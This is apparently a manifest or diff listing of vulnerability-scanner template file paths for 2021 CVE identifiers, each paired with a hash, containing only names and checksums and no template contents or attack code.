-http/cves/2021/CVE-2021-21803.yaml:b191f6d6adb12d05bf808da8c84391bb1987ad4c -http/cves/2021/CVE-2021-21805.yaml:85fc9089346d0d069d2e080996f834133a3cd714 -http/cves/2021/CVE-2021-21816.yaml:734364df0de89fa585b4e892522ffd2863a0e5ea -http/cves/2021/CVE-2021-21881.yaml:1c05e3d26b604c8349fa6ab20e62a0341e26a2fa -http/cves/2021/CVE-2021-21972.yaml:b6702cb93c3161bfea204c09da2aefb9d05cef64 -http/cves/2021/CVE-2021-21973.yaml:f45a7a2623f604b54f2ac03ba81c32a4a988f62e -http/cves/2021/CVE-2021-21975.yaml:120bd2e7d070d1cefa9a89e3a47f87c9b3193eb4 -http/cves/2021/CVE-2021-21978.yaml:0a1ec8654fa83e28e6cfdbefc04a162a9dfc733a -http/cves/2021/CVE-2021-21985.yaml:e45e1177090a150744b219abf6a122d23f666515 -http/cves/2021/CVE-2021-22005.yaml:d9efd4bef18ec897b03065ef8b3310bddc4eb291 -http/cves/2021/CVE-2021-22053.yaml:5e69fb9395ef33442c25eb7419df078be60a0e91 -http/cves/2021/CVE-2021-22054.yaml:cb7fad3247f73527a109d9b944a31db919b7aba3 -http/cves/2021/CVE-2021-22122.yaml:782d7f8050fc6c2dcf43e21c3980d687e4283a30 -http/cves/2021/CVE-2021-22145.yaml:3d656bc9aff70fae15716b717cbebc8dea22e1c0 -http/cves/2021/CVE-2021-22205.yaml:b416746de4013df668c081cf4101615fb9d3f357 -http/cves/2021/CVE-2021-22214.yaml:4ecf134631d961061d2f5b979d68020059ef15c6 -http/cves/2021/CVE-2021-22502.yaml:2de2427281185f7036e10bd3f9f26b8a6e485b04 -http/cves/2021/CVE-2021-22707.yaml:6a42f596f6b646065c6a7a0c309bd77f348a5459 -http/cves/2021/CVE-2021-22873.yaml:b8e49c083bf59a2cdb5dba527be6b7f05ab1abb5 -http/cves/2021/CVE-2021-22911.yaml:2dec162b237faee38a5b325d83697df54726c20c -http/cves/2021/CVE-2021-22986.yaml:288e119b1ff53126095877d08c4beb50d88ef1ed -http/cves/2021/CVE-2021-23241.yaml:23ce85c7b3e2dc426dcf7a0f53408c1da140d4c9 -http/cves/2021/CVE-2021-24145.yaml:58f7bd288d0797b9ab8b9bd636227c7f2512b0ae -http/cves/2021/CVE-2021-24146.yaml:3c582e09a9eb888497fe7c27c917969679df8375 -http/cves/2021/CVE-2021-24150.yaml:b450dc082c702742b6eb0a5406d35ee613cf1570 -http/cves/2021/CVE-2021-24155.yaml:953b4dd38d74eeaf5435210e0965e03ed892330c -http/cves/2021/CVE-2021-24165.yaml:ce67720cb0f0e2e9286e2cd08efd195b3ffd5cef -http/cves/2021/CVE-2021-24169.yaml:d6f0d4d8dd6de304ceb0cf517c4fea64712cfa11 -http/cves/2021/CVE-2021-24176.yaml:656bc2d46bad1bf24da80b698541e4ce4862527e -http/cves/2021/CVE-2021-24210.yaml:00e9f6687ab5c38650e41738cd5f987a684ba287 -http/cves/2021/CVE-2021-24214.yaml:e88b8006da6f9bd25269f6a090b487841ef47e62 -http/cves/2021/CVE-2021-24226.yaml:5a7d57b2bdef625250e68bceda390e3828f5211f -http/cves/2021/CVE-2021-24227.yaml:c4ef61e1f675965fab8f9699c02dccb95135e4ae -http/cves/2021/CVE-2021-24235.yaml:2fff7cf6b4d74684e2dd60133c849c624207f2ab -http/cves/2021/CVE-2021-24236.yaml:8308021f07b12d88589630099ded9c92c9e046f6 -http/cves/2021/CVE-2021-24237.yaml:32bd41a05eef0f84d56253079da12e96b020285d -http/cves/2021/CVE-2021-24239.yaml:0fec25030631174593850a94110b6a2b83e614e9 -http/cves/2021/CVE-2021-24245.yaml:40a8099d070b37950a2661bf0a9d749c3ca11bd0 -http/cves/2021/CVE-2021-24274.yaml:1f156ada9fac2aff40a3042c82993bc39d15cf84 -http/cves/2021/CVE-2021-24275.yaml:83561b6a0fc54e56d8607fa9352987b4c4b085f6 -http/cves/2021/CVE-2021-24276.yaml:983ba72bf4d156a515ea12968c35f6cf680a2d43 -http/cves/2021/CVE-2021-24278.yaml:10b72ff74b8a78e1e64a48619a2dfb8074ece2aa -http/cves/2021/CVE-2021-24284.yaml:aebeaf63c12e397907f380c917216eacbbdfb933 -http/cves/2021/CVE-2021-24285.yaml:8bdc48c29b0ec3df940f5ab07aa7f1df94122e83 -http/cves/2021/CVE-2021-24287.yaml:debf81a4fb390c5092403f8d9dc6065eae238140 -http/cves/2021/CVE-2021-24288.yaml:f2a66e89bbd74a3731bca2bdf03899f668b7d8a0 -http/cves/2021/CVE-2021-24291.yaml:6a8096c5bfd666b2b2d2dd7e020b09f9a6036650 -http/cves/2021/CVE-2021-24298.yaml:e451d1d0e0d5525d4378cc994a028264e04ea2ca -http/cves/2021/CVE-2021-24300.yaml:8879334bc64c3c55a5647c49d89d82d32741a877 -http/cves/2021/CVE-2021-24316.yaml:6ffcd290057339ac04a6121b4bc021cc75d0ef13 -http/cves/2021/CVE-2021-24320.yaml:15abbd8a86708539cf41a618b076159efc7440dd -http/cves/2021/CVE-2021-24335.yaml:5cc9cfff1f793317db1b1ea5c19a27749eeea11d -http/cves/2021/CVE-2021-24340.yaml:1d3491ac6e049333a364afa78c5969f86731739e -http/cves/2021/CVE-2021-24342.yaml:27cee2fb4afef5c576a6c39c03dd23501cade928 -http/cves/2021/CVE-2021-24347.yaml:65b753bc966cb7bc10e55725c6c77169d89c1de6 -http/cves/2021/CVE-2021-24351.yaml:efed60880b6d01e5fe1904da84169c24a1ba8652 -http/cves/2021/CVE-2021-24358.yaml:3b718bf211199043efb24cf46ced00e586d35847 -http/cves/2021/CVE-2021-24364.yaml:978cbcf1f65c31ee9e519dcd7107732b6c9afd3b -http/cves/2021/CVE-2021-24370.yaml:94d0be074f6767e0596f28aed39702b3dd795398 -http/cves/2021/CVE-2021-24387.yaml:b69d3cc43e59e94d21321aac18ef36657a4f0f9e -http/cves/2021/CVE-2021-24389.yaml:d245707072ddeb31ea1cfbcd67f76f4e68ea843b -http/cves/2021/CVE-2021-24406.yaml:2bd8cca181ce062dcc18a8f4f192a1fd8974c899 -http/cves/2021/CVE-2021-24407.yaml:930d2dc64468c8ee7d9aa5e71be9de535748b6ca -http/cves/2021/CVE-2021-24409.yaml:85c09988fa033cc10039a8c9b2c633a222c55134 -http/cves/2021/CVE-2021-24435.yaml:89522ee18258ad0300e1bb5022d44880b1808787 -http/cves/2021/CVE-2021-24436.yaml:b63bfee3cabf85be86e0559dc7dfa913491d57fd -http/cves/2021/CVE-2021-24452.yaml:9d8db2861a445eff4ef21b5a784ff3e7aa639189 -http/cves/2021/CVE-2021-24472.yaml:616084029cea76b6edd27c50e179d52f4d16cbff -http/cves/2021/CVE-2021-24488.yaml:ae6777b8174869399f3d89b085bbcc20ef392ef2 -http/cves/2021/CVE-2021-24495.yaml:484761ea40b28577aee44a0caed0863901524fc4 -http/cves/2021/CVE-2021-24498.yaml:fc1264eba2f20f567ae8317d0bcb12fdccf327dc -http/cves/2021/CVE-2021-24499.yaml:2fd32e885e8a0245d60667034e5a2768e8eba3f1 -http/cves/2021/CVE-2021-24510.yaml:b17e53faf2d8e6a95c7d7d6d2c0d21e32cbf8e15 -http/cves/2021/CVE-2021-24554.yaml:823f2be93ce2ea349cc83392fa99330f51e83a26 -http/cves/2021/CVE-2021-24647.yaml:c2d2ed961680c942efaab1d9c74444801748848f -http/cves/2021/CVE-2021-24666.yaml:cb4abfcc866b9c1beabce6cd903e4d06b997c898 -http/cves/2021/CVE-2021-24731.yaml:9c60a363f8e298c770e6d089239e73f4962eabf5 -http/cves/2021/CVE-2021-24746.yaml:55ae353f5df55cb51ac92ad249fd46752820e6e0 -http/cves/2021/CVE-2021-24750.yaml:556197044f0d28f03180c6c1af81b053930fda22 -http/cves/2021/CVE-2021-24762.yaml:dbffb026895a3312cdef2ba69b786544f73e78f3 -http/cves/2021/CVE-2021-24827.yaml:4686ab68fe8d562f638d2c1a57ba57f313ae4fcd -http/cves/2021/CVE-2021-24838.yaml:ac122ab8afbdd9b9f185e6d5d32a78611c81557f -http/cves/2021/CVE-2021-24862.yaml:a008e08577c1b3b1f6065ad8179439c365cf0d84 -http/cves/2021/CVE-2021-24875.yaml:99903067a722618de660f9964ac0dbeb7a676ad0 -http/cves/2021/CVE-2021-24891.yaml:eef5657de7b9912c7812c5a9cfb3951bd7144d4c -http/cves/2021/CVE-2021-24910.yaml:60db56164e1e75fca82be5606e9a8327c0df9e39 -http/cves/2021/CVE-2021-24917.yaml:f89c45e4badf06ab62268a606ed87c9271b976bd -http/cves/2021/CVE-2021-24926.yaml:9f7423059d757f893c81fcb1026f3e0e6377b102 -http/cves/2021/CVE-2021-24931.yaml:01b156ebc29e085d3166dd2403eaa2c3291b2971 -http/cves/2021/CVE-2021-24940.yaml:d45869da3b028f478e68297809cda80c2ba09514 -http/cves/2021/CVE-2021-24946.yaml:a66667d8b55924c32e3398076d925efab151cc3c -http/cves/2021/CVE-2021-24947.yaml:e8d2ed67336f6ce2ea36c5929006ff139ab5e195 -http/cves/2021/CVE-2021-24956.yaml:45775b8faf815c3e3916fa03d05218061a0be0ec -http/cves/2021/CVE-2021-24970.yaml:fe0c7be41b46557cdc9a19c814938dc5045f1304 -http/cves/2021/CVE-2021-24987.yaml:fd00743ea8f0d1ed97ff861b7e714a32b537c3e4 -http/cves/2021/CVE-2021-24991.yaml:034329258d80c44bd7fd9ca932560d9a23128a45 -http/cves/2021/CVE-2021-24997.yaml:994d758a1fefc901aa3eb4e774dcc6e50be41897 -http/cves/2021/CVE-2021-25003.yaml:33af9029d04ed5b2490e9479f987847465a92448 -http/cves/2021/CVE-2021-25008.yaml:6425feb23bcd3b480ea63a2f00985cfbabaf880b -http/cves/2021/CVE-2021-25028.yaml:0c5dde62b7012b83859a34ff38d56a5fd0009c1b -http/cves/2021/CVE-2021-25033.yaml:8613f053b3c857131958afa1780b056f5bae0da1 -http/cves/2021/CVE-2021-25052.yaml:746e605ced68c1f0579084ec7f4cd23fecf0c6c0 -http/cves/2021/CVE-2021-25055.yaml:870e334ae277a906dab32e037ff0a16a9ca6d506 -http/cves/2021/CVE-2021-25063.yaml:52fdfd9235409b2a00dd9a130fe738c18a6e6232 -http/cves/2021/CVE-2021-25065.yaml:3ff5434b72bf4b173127ec9f2c4c81b53c74f371 -http/cves/2021/CVE-2021-25067.yaml:ab0d87da0eceb32e0a0f267823a3da3b881fd9c2 -http/cves/2021/CVE-2021-25074.yaml:14459dbf5767e8eeb47e7a48764b2ce360c69405 -http/cves/2021/CVE-2021-25075.yaml:c26c3f3efc36ee0cdef881e6af0af8fbc3f3be7d -http/cves/2021/CVE-2021-25078.yaml:f7878d1c3b7683c79c36c7121c6db7cc4587c82c -http/cves/2021/CVE-2021-25085.yaml:dee8ee96c0ab0a8a411ab5c8549ff16de909cb69 -http/cves/2021/CVE-2021-25099.yaml:e84e6eec9d0ec218caf94962838eb2e022db9092 -http/cves/2021/CVE-2021-25104.yaml:41cd33202d6697760677db284a0ea3df3bf84b69 -http/cves/2021/CVE-2021-25111.yaml:2e204aa9a90434a4dd424e3cf0b46aff6ce5e82a -http/cves/2021/CVE-2021-25112.yaml:0e7e1936e2948f2b5ecb481696adee2a9dc296d1 -http/cves/2021/CVE-2021-25114.yaml:044ed0956168eafa07e93e30cc37ee67280ea155 -http/cves/2021/CVE-2021-25118.yaml:21c3875dae96db8bc87de8c1d6c2b9756e3803c8 -http/cves/2021/CVE-2021-25120.yaml:32330164561c70f09772df4f13112d27d6c00a4f -http/cves/2021/CVE-2021-25281.yaml:432c2607d249c6d8934095b05d2eba554293475f -http/cves/2021/CVE-2021-25296.yaml:2e87ae0f0ebf36c9717c23ef1584114e15539d14 -http/cves/2021/CVE-2021-25297.yaml:4b77243b2e38b844622af919860520eb3f383b8f -http/cves/2021/CVE-2021-25298.yaml:79afdd570a0f095825b0340290bdbc5269998d38 -http/cves/2021/CVE-2021-25299.yaml:899b183e26393b94cd7ae217db6b8f0f8bfbc787 -http/cves/2021/CVE-2021-25646.yaml:ded2446c1b502aa26ad240bf7a90a3c2e5b3f82e -http/cves/2021/CVE-2021-25864.yaml:85f95d2bd57962998b8230f0ac6cedc7e699d0ac -http/cves/2021/CVE-2021-25899.yaml:570e58a8bb66cb1f261757539c34b6905d56d0ee -http/cves/2021/CVE-2021-26084.yaml:f716850128f172a00e2c563aa8be271b26970d1d -http/cves/2021/CVE-2021-26085.yaml:59cfc39645194f99748c99807ac5ff75aab325d4 -http/cves/2021/CVE-2021-26086.yaml:4b0d7fc005c4849659f0c2fbd05fa85f4aca5428 -http/cves/2021/CVE-2021-26247.yaml:af820fbdb93fb7eced89d39b1183c3b084663934 -http/cves/2021/CVE-2021-26295.yaml:ebb1ffa9ef2ec29b352967c15ab1d9e1d58815ec -http/cves/2021/CVE-2021-26475.yaml:e0324a1136390469ad7ed634b957aed2611d2f05 -http/cves/2021/CVE-2021-26598.yaml:2a0baa2bb1ca7242b86b75f18465dff5cf9799fc -http/cves/2021/CVE-2021-26702.yaml:19b91a43950add0481f0af39a0146a5807db03f6 -http/cves/2021/CVE-2021-26710.yaml:c21d8aa87ef47b2608ad0cffe93016ca1762977f -http/cves/2021/CVE-2021-26723.yaml:d0a43a348be01b4d28d9f47dba8e9dab4dc5a1b6 -http/cves/2021/CVE-2021-26812.yaml:7295d7fcef451e585b07790522b3856666bd1b62 -http/cves/2021/CVE-2021-26855.yaml:a0c2bcb45f57dfce2813ba13216c1f2a00eb6dab -http/cves/2021/CVE-2021-27124.yaml:f99a30867c891f183b03dcf8d71ecbb47b25e155 -http/cves/2021/CVE-2021-27132.yaml:06859a01cdd7d6d5da52120ae0e59e5616aef866 -http/cves/2021/CVE-2021-27309.yaml:185327ecedf110b79a59d0086b836a6f24f10c6a -http/cves/2021/CVE-2021-27310.yaml:1500760bc1a9a767d9f9b8fd8e5715a817637c2a -http/cves/2021/CVE-2021-27314.yaml:c5a3840f42de120de5a3280ecbeb1ea50bc05ba1 -http/cves/2021/CVE-2021-27315.yaml:b8f2fb5e4b41178451f7c05514489c7d428dd1bc -http/cves/2021/CVE-2021-27316.yaml:add18d7b1a2909a582063520b857fda25f487a35 -http/cves/2021/CVE-2021-27319.yaml:bc2e0bfcaceb7ffd30064bca7b6d05da16e1c4f7 -http/cves/2021/CVE-2021-27320.yaml:c13b833c0c23fc666c043da58a61546548a77c30 -http/cves/2021/CVE-2021-27330.yaml:5ee23b2d23edf85f2eab9aa18c06973910ecd782 -http/cves/2021/CVE-2021-27358.yaml:b7e91b6d7609f43dc93810cd7f7414002fef4918 -http/cves/2021/CVE-2021-27519.yaml:74bd3ff793855819bc37f04afe7653b6bee04388 -http/cves/2021/CVE-2021-27520.yaml:67685adccc95b240cc7c4a8e9f5de9744549b579 -http/cves/2021/CVE-2021-27561.yaml:2402d21a744ab76f7c2fd1c32d201b4c27ca080f -http/cves/2021/CVE-2021-27651.yaml:cf8262b2a51c7917d4e172334b7e42b6b8e08d83 -http/cves/2021/CVE-2021-27670.yaml:03ba213fcf9662e39a2af1dbeb57907d4769c8e8 -http/cves/2021/CVE-2021-27748.yaml:6bd5e7d3d6c608542a279c7b3e5d4f7d0fb374df -http/cves/2021/CVE-2021-27850.yaml:4bd32414f577ea21323dd54c4619dc9e1c9dbce2 -http/cves/2021/CVE-2021-27905.yaml:d3bb023ca3ae2e0a45072d7b8f960f703038ae4a -http/cves/2021/CVE-2021-27909.yaml:a9f5df6281784fc8ad29697bd63038c88a2720b5 -http/cves/2021/CVE-2021-27931.yaml:32239e0ca67251b7bf4c76ea7667489f3bebb7f3 -http/cves/2021/CVE-2021-28073.yaml:69f74fc3fb3eaaba2ff068f7b94fd56832f51386 -http/cves/2021/CVE-2021-28149.yaml:8b4fb32140c3d0ceebbf5f153c7a97a4078a8a1d -http/cves/2021/CVE-2021-28150.yaml:e5c65e4657e3abd50184bdab571ce67201d43c43 -http/cves/2021/CVE-2021-28151.yaml:8ff090cc375bb10ab77d6a1d52b6ed20cf6ec29c -http/cves/2021/CVE-2021-28164.yaml:1701d1e48662701fd15a47516533ec36c4c4aa35 -http/cves/2021/CVE-2021-28169.yaml:ba450ef26bdc076bb8ebe7ba1372db8ce7f6edd0 -http/cves/2021/CVE-2021-28377.yaml:57fafd9e41ca4ec5d36cda048d0dcdec95ae06aa -http/cves/2021/CVE-2021-28419.yaml:4eee536220c4007b83c080787cddc0caeddaaae0 -http/cves/2021/CVE-2021-28854.yaml:14839b5069b5fe02be759b2f2aa2c5fcf2e4a9d4 -http/cves/2021/CVE-2021-28918.yaml:f31a96d660ae3c1009622481aa70547846c71900 -http/cves/2021/CVE-2021-28937.yaml:7b16e14583978da0f61172fac4ad4d360ab66fa8 -http/cves/2021/CVE-2021-29156.yaml:f1c9b89b9e12c5e7538810d1e2b0b54972b43c5c -http/cves/2021/CVE-2021-29203.yaml:13ee2c2d57ffada3229be15c3566ba361971630c -http/cves/2021/CVE-2021-29441.yaml:ca9c1687841133878692509b8cf34a6ec6b2e880 -http/cves/2021/CVE-2021-29442.yaml:f635d8f59a98d2bed57684736e17c7b37c6bff52 -http/cves/2021/CVE-2021-29484.yaml:a6d9aa5182f023f8c869272425a29c8deea6d74c -http/cves/2021/CVE-2021-29490.yaml:6ac4dcc8c31b838c81deb71ab3df0240ca3863d5 -http/cves/2021/CVE-2021-29505.yaml:98b70c1455d14f6dde89b038b6a7a44375140123 -http/cves/2021/CVE-2021-29622.yaml:f75740c86069684011bc814d46d7f67c2033b4b9 -http/cves/2021/CVE-2021-29625.yaml:023e109b5fca3260d224a060ddf524fa0d4eee54 -http/cves/2021/CVE-2021-3002.yaml:cb2801ff0b943f6f8332b82ab2a824e0332c9d27 -http/cves/2021/CVE-2021-30049.yaml:debac0b6f99ef89546375d4cb647f22003702c49 -http/cves/2021/CVE-2021-30128.yaml:e383bb54ae7fda16e5192737556af736456a7081 -http/cves/2021/CVE-2021-30134.yaml:7ec8acb6c8efe0588cecdef3648ee7c5ad92e056 -http/cves/2021/CVE-2021-30151.yaml:990e3c3e5e3d0a27aab3f62c24dd7614114b6b02 -http/cves/2021/CVE-2021-3017.yaml:f854828b7e7b567413730766611bca6408201125 -http/cves/2021/CVE-2021-30175.yaml:32c634352f52572d41172f025756e6faefb8a160 -http/cves/2021/CVE-2021-3019.yaml:5567c619fd53cac75dc21d12758fa440da2fe659 -http/cves/2021/CVE-2021-30213.yaml:2e5b9e5ed169117302fc917012db3ecef3b5e482 -http/cves/2021/CVE-2021-30461.yaml:24ffb982dbaf79583cba2fad4151b88def1cf3bd -http/cves/2021/CVE-2021-30497.yaml:fdb66aa2c5998021e4b555ac2945696199e23b2d -http/cves/2021/CVE-2021-3110.yaml:a9ed636325a82b3159b335d84f69ec112de32680 -http/cves/2021/CVE-2021-31195.yaml:4262d9267dc8649caa96d244ceee3b9f6cfc434b -http/cves/2021/CVE-2021-31249.yaml:680c2915ba4863907491587fdb2ebd791ea3623a -http/cves/2021/CVE-2021-31250.yaml:d8dd0f2e2d1272675d21c362601ca1937bfc2560 -http/cves/2021/CVE-2021-3129.yaml:c9413bc0a83eab4a89b8d437e19fa96ecfed225b -http/cves/2021/CVE-2021-31537.yaml:dfd9ef56d4a2c14a7d0633a49f04413ffe5a2c40 -http/cves/2021/CVE-2021-31581.yaml:503479ab16110b27fb35e35259db8ca185d111ca -http/cves/2021/CVE-2021-31589.yaml:b22d1378b4bfac4448bcb62595fc288cf649589c -http/cves/2021/CVE-2021-31602.yaml:c0c8fa701427bab84590396934cce6c3a250be1a -http/cves/2021/CVE-2021-31682.yaml:b725872b8a66b9fbc7347857cc892da16b407022 -http/cves/2021/CVE-2021-31755.yaml:8561e9fa54497be0a38c5ab3d1d254f8e9d48906 -http/cves/2021/CVE-2021-31805.yaml:7046d54764250874d24f91d38a56eaa5ffd8120f -http/cves/2021/CVE-2021-31856.yaml:cfebab53da73d2abc94d7a2480aeb041dc00e622 -http/cves/2021/CVE-2021-31862.yaml:a8c14f3620f5a1ea6866e79afe423e3b8c667991 -http/cves/2021/CVE-2021-32030.yaml:8d66cb58ea47f28182482ac7713507e71b8c0eb4 -http/cves/2021/CVE-2021-32172.yaml:5afb2187bc4ebb13bfd162e3339c5007d08080b0 -http/cves/2021/CVE-2021-3223.yaml:75779f96431ac84df4844378896bff84f3f733d3 -http/cves/2021/CVE-2021-32305.yaml:b90f510658bd545e606e963f7a7a441b18fadd35 -http/cves/2021/CVE-2021-32618.yaml:ae82c1c62131c35888c4f982af46a63950c008b0 -http/cves/2021/CVE-2021-32682.yaml:65025e265bed46f6ff4e28ce13aefbef0a1e328d -http/cves/2021/CVE-2021-32789.yaml:8493c43c5b2aa78db8775f2e36b81c4e1f452b3f -http/cves/2021/CVE-2021-32819.yaml:12acc136b729774b5a51353174da5ede41f2b75c -http/cves/2021/CVE-2021-32820.yaml:2825a46b5d72919f6322460fce7108d644c00fbc -http/cves/2021/CVE-2021-32853.yaml:3d837228412c6806861608952f7cb74f9b4e2b3a -http/cves/2021/CVE-2021-3293.yaml:303e8dcc8e0f581cc5fa853a6a2ab7f825269f90 -http/cves/2021/CVE-2021-3297.yaml:d577a70bcd2298063b04e6c5c53b7c0fb318a541 -http/cves/2021/CVE-2021-33044.yaml:c1b82955a1b7f9e1933ab8d49a8c80f59027915e -http/cves/2021/CVE-2021-33221.yaml:b12c14d27e6b333ae19134583aaaa5a159d8c5e1 -http/cves/2021/CVE-2021-33357.yaml:3b9fba3be02b1be1900d7f6cb04b173c02f43f9c -http/cves/2021/CVE-2021-33544.yaml:fb64865f3f8f7b9373090889673f3d2277f6bdaa -http/cves/2021/CVE-2021-33564.yaml:127df950ac4b7df54efba67906c2a34fe61fb3eb -http/cves/2021/CVE-2021-3374.yaml:87f67752f5410fdc51bf355e96a677d23edbebfa -http/cves/2021/CVE-2021-3377.yaml:e5cb54b54153ecd2b2799b630ecc4cb08170feb2 -http/cves/2021/CVE-2021-3378.yaml:b24d65dda7a95330deadb6dc64d4efc19d5d323f -http/cves/2021/CVE-2021-33807.yaml:61b4691b285069613aa002daacf9dc896d5f08b0 -http/cves/2021/CVE-2021-33851.yaml:e5b16dadab4a447dca23e1fb0ddb7ff40ccc0a77 -http/cves/2021/CVE-2021-33904.yaml:5749ce93f4cadc53f03ce2942070cbe4bc05e059 -http/cves/2021/CVE-2021-34370.yaml:566d68afbd31c7afaf2a3fb2d0941e9454002fe5 -http/cves/2021/CVE-2021-34429.yaml:9c5542b9d99ab868d6deaad9bf039768cd7ff432 -http/cves/2021/CVE-2021-34473.yaml:9b9b058483dcbdfafd422ff106770fb0769c2772 -http/cves/2021/CVE-2021-34621.yaml:220af592598bb097132f673a9bc94c7fd1c6e6da -http/cves/2021/CVE-2021-34640.yaml:be06d62afa752e2eadb7e5ee7caf74e6f2da6ca3 -http/cves/2021/CVE-2021-34643.yaml:58d612587cdfa1eae090747aa7f7290ae4fde915 -http/cves/2021/CVE-2021-34805.yaml:dc3ba696a4abecdc1bf3aed5f0908c0da01bf425 -http/cves/2021/CVE-2021-35250.yaml:9ae829f5ad0bfd60b96cfbc7b06e3f1ec0064b3a -http/cves/2021/CVE-2021-35265.yaml:2fffee39254407a3d8df3df85e10315b75f75a1f -http/cves/2021/CVE-2021-35336.yaml:e976dd54bcb3295555b75d6fdde06f68630518a0 -http/cves/2021/CVE-2021-35380.yaml:b59fac264007013fbdfde2a9cfe7a38d32a60da9 -http/cves/2021/CVE-2021-35464.yaml:f3cb72143ea3eca7e63e48b27eb75f924bf7eb56 -http/cves/2021/CVE-2021-35488.yaml:a59a967b8cf235abe0a79ce0e1c22e2a158d8d43 -http/cves/2021/CVE-2021-35587.yaml:a01cc381aced5391ff0b105642dfc7f1b60e1ba0 -http/cves/2021/CVE-2021-3577.yaml:514e3f4efe753189edb9430655fb6214d448b4dd -http/cves/2021/CVE-2021-36260.yaml:8a3d5cdc8645f3d9fedb8686150887c09141d076 -http/cves/2021/CVE-2021-36356.yaml:40dca6e44be862c1ba7957b2f03466fc6b851d5f -http/cves/2021/CVE-2021-36380.yaml:f6e6eebe80486780c164722d4bdb83174108576e -http/cves/2021/CVE-2021-36450.yaml:f1b9160de7c1774dc747503103f660486343c433 -http/cves/2021/CVE-2021-3654.yaml:bb82da5b0987b0b7eefcb0e4c8815326fbc51228 -http/cves/2021/CVE-2021-36580.yaml:e166a4362f355ed40a3b50a0e7b8ebd20d431a03 -http/cves/2021/CVE-2021-36748.yaml:d2aebd574e132dc04f51f8fc17c393c9e6474ed1 -http/cves/2021/CVE-2021-36749.yaml:92e0d9289ac609bffddb84fa547cca58bf687928 -http/cves/2021/CVE-2021-36873.yaml:4cfcc52832c9dcd0d3b21e39d36e74b3afa1512e -http/cves/2021/CVE-2021-37216.yaml:7d72cf8bfa3cea9b95bb1eb79bee68101e01addc -http/cves/2021/CVE-2021-37304.yaml:a340af75d4c2a300f278828ebcba2cd6a2ea5522 -http/cves/2021/CVE-2021-37305.yaml:49d352c8a94d5e8869280333083c2c0d067280b9 -http/cves/2021/CVE-2021-37416.yaml:0598208560b5769d0f8c0093fa348fe5ea9331d1 -http/cves/2021/CVE-2021-37538.yaml:141cc60635b096794ffa7c8b6f84421fbe3a9a3d -http/cves/2021/CVE-2021-37573.yaml:45adf4db3b4f37dadec2ddb5c749b10bf15612fa -http/cves/2021/CVE-2021-37580.yaml:4d07c8030e229a4d953b7b7890e3c91aa8182c08 -http/cves/2021/CVE-2021-37589.yaml:09650c16bfd826e278e212625c2cf6fa4b51a965 -http/cves/2021/CVE-2021-37704.yaml:cdc07067136a7f697ac38d18a56053a375b12252 -http/cves/2021/CVE-2021-37833.yaml:4cf0b9eeefd7f51141723b882fcca27dd8cc8312 -http/cves/2021/CVE-2021-38314.yaml:c63a988b13a27fa3a21c1c8357ecd98bee9dfcd3 -http/cves/2021/CVE-2021-38540.yaml:a4af531815618feb5cb4d6cb4f059fe948fa54fd -http/cves/2021/CVE-2021-38647.yaml:0ca00525e171374482dfd45a24196838f6e8d788 -http/cves/2021/CVE-2021-38702.yaml:4874896ead52e9a24471a4b6aa86d122bee01faa -http/cves/2021/CVE-2021-38704.yaml:f420af4f22742f9c015d224b4e3f95e3c72b851a -http/cves/2021/CVE-2021-38751.yaml:ae3e4418e69e4e49ea0f676793f6472c7fcc68b0 -http/cves/2021/CVE-2021-39141.yaml:b6d6cf139ecdc33fa3bf33c5fed09117b358592a -http/cves/2021/CVE-2021-39144.yaml:87940affdbc4ad006725494e4423521cc949572c -http/cves/2021/CVE-2021-39146.yaml:c760be754bf370d52426d21c2a500e4bb7b0cf0f -http/cves/2021/CVE-2021-39152.yaml:6cca95ae2d00255430eb11dc4c3d955c49c0dac0 -http/cves/2021/CVE-2021-39165.yaml:2c94054e7a3ce2a5e2ec20ae2da7e4a4b972736b -http/cves/2021/CVE-2021-39211.yaml:2f73fd3fafabb7c8095ba5c61b23b82b05102fa2 -http/cves/2021/CVE-2021-39226.yaml:e99f5d603a5dc6d89113829b1b3fb62912982874 -http/cves/2021/CVE-2021-39312.yaml:1409abc9e380754ce1aaaa8c74a46ce95e19b178 -http/cves/2021/CVE-2021-39316.yaml:21315644f68bf280b4146c0e7bb2ccd7e90063a5 -http/cves/2021/CVE-2021-39320.yaml:93f69c9de2fedc648db7714ae5b702d6f97064e8 -http/cves/2021/CVE-2021-39322.yaml:bb53ac9ffa3220a3ee8ce35599b4d052b4bd37a5 -http/cves/2021/CVE-2021-39327.yaml:f7dc9f52749b8a0bc6af9aa70fca2524e702c736 -http/cves/2021/CVE-2021-39350.yaml:efbfcbe6af2e2b4b4eb20fe7e3a39f7837c73cf5 -http/cves/2021/CVE-2021-39433.yaml:e1fb9ba24f06c29de4a0d4de3239a2cf4306a5e5 -http/cves/2021/CVE-2021-39501.yaml:a8ad39a35b924408c2722ab75d6a4a539e185d13 -http/cves/2021/CVE-2021-40149.yaml:ab5b32b0925a33ee6bb8ecf55a7c668e471f6312 -http/cves/2021/CVE-2021-40150.yaml:64dcb3caebd2cd1af2dda9555ad045da84a09c84 -http/cves/2021/CVE-2021-40323.yaml:b4847bb0cdff3a57e485b1a0203329f610cb7282 -http/cves/2021/CVE-2021-40438.yaml:db0ac26bb00809177ef68c840a8440c96548a2d8 -http/cves/2021/CVE-2021-40539.yaml:5ce7d228e97f848c76a18186e0bb5edffc2d06b7 -http/cves/2021/CVE-2021-40542.yaml:ce7cc7c3b96c6ab838ea3c0e498b430615bda2ef -http/cves/2021/CVE-2021-40661.yaml:9e77105603dcfff992085c830fa49886134dd61b -http/cves/2021/CVE-2021-40822.yaml:095ca3f6252d312b685d541a1b603759cfc127b7 -http/cves/2021/CVE-2021-40856.yaml:c04c4b165826bc436e1834473ab1a11493819186 -http/cves/2021/CVE-2021-40859.yaml:cecadcea84416f329a4f41592184d457af11fc11 -http/cves/2021/CVE-2021-40868.yaml:c1952f071c7d3bfd0922359927d2553b66fe6254 -http/cves/2021/CVE-2021-40870.yaml:903abddcf5a8ba7dfb1cbd5f6725dff593107b1a -http/cves/2021/CVE-2021-40875.yaml:f957a8c927a0d17529c4adbbc755792da79bf5e9 -http/cves/2021/CVE-2021-40908.yaml:bf38c632366f9b9e4e322e5b175908bff64cdb04 -http/cves/2021/CVE-2021-40960.yaml:0bb50295c3a8aba4dc5719bb68560d8d53a2348e -http/cves/2021/CVE-2021-40968.yaml:b804963db909436d83d6bd6d5277200c5cef3798 -http/cves/2021/CVE-2021-40969.yaml:f0e1c4dddea80fe29e5f3bed90a65469ae50058d -http/cves/2021/CVE-2021-40970.yaml:568e6e97d774ca309245227edeff9f7e0d37b935 -http/cves/2021/CVE-2021-40971.yaml:47f32d8f49fe8652fba3f4b7c56127ec2bc10ae7 